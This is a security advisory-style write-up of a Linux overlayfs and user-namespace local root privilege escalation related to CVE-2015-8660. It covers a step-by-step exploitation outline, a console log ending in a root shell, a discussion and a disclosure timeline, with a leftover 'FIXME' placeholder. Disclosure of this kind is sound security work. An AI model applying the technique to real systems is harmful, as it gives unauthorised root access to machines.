Linux User Namespace Overlayfs Local Root Privilege Escalation

Problem description:

Linux user namespace allows to mount file systems as normal user, including the overlayfs. As many of those features were not designed with namespaces in mind, this increase the attack surface of the Linux kernel interface. Due to missing security checks when changing mode of files on overlayfs, a SUID binary can be created within user namespace but executed from outside to gain root privileges.

Overlayfs was intended to allow create writeable filesystems when running on readonly medias, e.g. on a live-CD. In such scenario, the lower filesystem contains the read-only data from the medium, the upper filesystem part is mixed with the lower part. This mixture is then presented as an overlayfs at a given mount point. When writing to this overlayfs, the write will only modify the data in upper, which may reside on a tmpfs for that purpose.

One problematic use case is the modification of file or attributes of files on the overlayfs within a user namespace. A user without any capabilities on the host is given CAP_SYSADMIN within the user namespace, thus having capabilities to change the attributes of files on the overlayfs when not checking, if the host-system user would also have the capability to change the attributes of the file without having CAP_SYSADMIN there also. As this check was missing, the process within namespace could gain read/write access to arbitrary files. Combined with the SUID-write technique from a previous article (SetgidDirectoryPrivilegeEscalation), modification of host-UID-0 SUID-binaries allows escalation to host root user.

Methods

Exploitation Technique:

Exploitation is technically quite simple:

Create new user and mount namespace using clone with CLONE_NEWUSER|CLONE_NEWNS flags.
Mount an overlayfs using /bin as lower filesystem, some temporary directories as upper and work directory.
Overlayfs mount would only be visible within user namespace, so let namespace process change CWD to overlayfs, thus making the overlayfs also visible outside the namespace via the proc filesystem.
Make su on overlayfs world writable without changing the owner
Let process outside user namespace write arbitrary content to the file applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.
Execute the modified su binary

POC:

This exploit uses one parent and one user namespace process. The namespace process creates the overlayfs mount, chdirs to the directory and makes su writable. Afterwards this process waits until the parent has gained root privileges before rolling everything back: unmounting, cleanup of helper files. As soon as the parent process notices, that the child has prepared su as intended, it uses the technique from SetgidDirectoryPrivilegeEscalation, that is calling another SUID binary, e.g. mount, to use stderr to write to the opened su file without loosing SUID bit. Afterwards parent process invokes the modified su to create an UID 0 process. The change of the parent's UID then triggers the namespace child to start cleanup. See UserNamespaceOverlayfsSetuidWriteExec.c for example code.

build# ./UserNamespaceOverlayfsSetuidWriteExec -- /bin/bash Setting uid map in /proc/491/uid_map Setting gid map in /proc/491/gid_map euid: 0, egid: 0 euid: 0, egid: 0 Namespace helper waiting for modification completion Namespace part completed root#

Results, Discussion

The missing security checks in overlayfs were just a mistake, that should not happen, but which by itself would not have those devastating effects. By exposing quite some kernel functionality to unprivileged users via user namespaces, this increases the attack surface of the kernel significantly. Thus it might be a good idea to deactivate it on standard kernels by default and grant it only to selected users.

For the above exploit to work, not only exposure within the namespace is required, a process from outside uses /proc to access the mounts which should be visible only to processes within the namespace. This is by itself already a risk but might be also a security vulnerability by itself, worth fixing. Mixing content from within namespaces and processes outside the namespace was also used to for FIXME.

Timeline

20151206: First LKML acitivity (no hint on security effects) https://lkml.org/lkml/2015/12/6/137
20151224: Discovery, report at Ubuntu
20151224: Read about probably similar vulnerability on oss-security
20151224: Confirmation from Ubuntu that fix for CVE-2015-8660 also mitigates against vuln from this report
20151224: Tests on new Fedora, kernel-4.2.8-300.fc23, not vulnerable
20160110: Full disclosure post
20160122: Patch to disable unprivileged userns due to this and other issues LKML

Introduction